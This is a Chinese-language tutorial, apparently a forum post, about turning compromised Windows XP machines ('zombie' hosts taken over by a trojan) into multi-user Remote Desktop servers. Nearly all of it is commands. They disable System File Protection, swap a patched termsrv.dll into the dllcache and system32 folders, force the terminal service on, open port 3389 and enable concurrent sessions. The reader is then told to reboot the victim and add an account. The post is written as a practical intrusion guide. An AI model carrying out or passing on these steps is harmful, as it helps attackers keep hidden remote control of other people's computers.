让XP肉鸡终端服务实现多用户登陆
条件:1肉鸡是XPP2的
2你可以上传文件
3可以执行命令
4肉鸡重启后不会丢!
(你要是有鸽子肉鸡,上面的条件很好满足的嘛!)
开工:
首先我们上传XPP2英文2055版的termsrv.dll文件,上传到C盘下,
然后干掉XP的系统文件保护,修改他的注册表(防止我们修改文件时弹出提示框来)
echo Windows Registry Editor Version 5.00>>20.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon]>>20.reg
echo "SFCDisable"=dword:ffffff9d>>20.reg
命令regedit /s 20.reg导入注册表
命令del 20.reg 删除
现在来替换文件(termsrv.dll文件系统里有2个,一个在dllcache文件夹里,一个在system32文件夹里
我们都替换掉)
命令:copy c:/termsrv.dll c:/windows/system32/dllcache/termsrv.dll
这个命令不用解释了吧,命令执行后有个提示,问你是否修改termsrv.dll文件,因为dllcache文件夹里有
一个termsrv.dll文件,选Y回车就可以了
再来替换system32下的termsrv.dll文件,你要是还直接还使用copy命令,肯定失败.提示文件在使用中.
我们来利用win系统的特性修改它,使用中的系统文件可以改名.
切换到system32目录
命令:rename termsrv.dll ter.dll
这个命令是把termsrv.dll文件改名为ter.dll<--这个名字可以随便改
命令:dir ter.dll
看看是否成功
命令:copy c:/termsrv.dll c:/windows/system32/termsrv.dll
把我们的termsrv.dll放到system32下
命令:dir termsrv.dll
查看一下
开启终端服务:
命令:sc config termservice start= auto
把终端服务状态改为自动,服务状态是禁用的话,你用net命令开可不起作用呦
启动服务命令:sc start termservice或net start termservice(这两个命令偶不喜欢,有时候不知道什么原因总不成功)
偶喜欢修改注册表:
echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp]>>3389.reg
echo "PortNumber"=dword:00000D3D>>3389.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp]>>3389.reg
echo "PortNumber"=dword:000000D3D>>3389.reg
命令 regedit /s 3389.reg导入注册表
命令 del 3389.reg 删除
检查一下
命令: netstat -an |find "3389"
看看是否打开终端端口
最后还要修改注册表才能多用户登陆:
echo Windows Registry Editor Version 5.00>>21.reg
echo [HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/Terminal Server/Licensing Core]>>21.reg
echo "EnableConcurrentSessions"=dword:00000001>>21.reg
命令regedit /s 21.reg导入注册表
命令del 21.reg 删除
重启肉鸡,肉鸡重启后,就会加载我们的termsrv.dll文件,(它原来的被我们改名了..嘎嘎)
等待肉鸡上线,就可以登陆了(不要忘了加个帐号哟)
扫一扫
9030
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
